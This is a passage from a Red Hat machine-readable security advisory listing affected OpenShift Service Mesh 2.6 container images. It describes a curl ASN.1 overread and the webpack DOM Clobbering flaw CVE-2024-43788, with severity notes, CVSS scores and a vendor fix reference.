"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "curl: libcurl: ASN.1 date parser overread"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
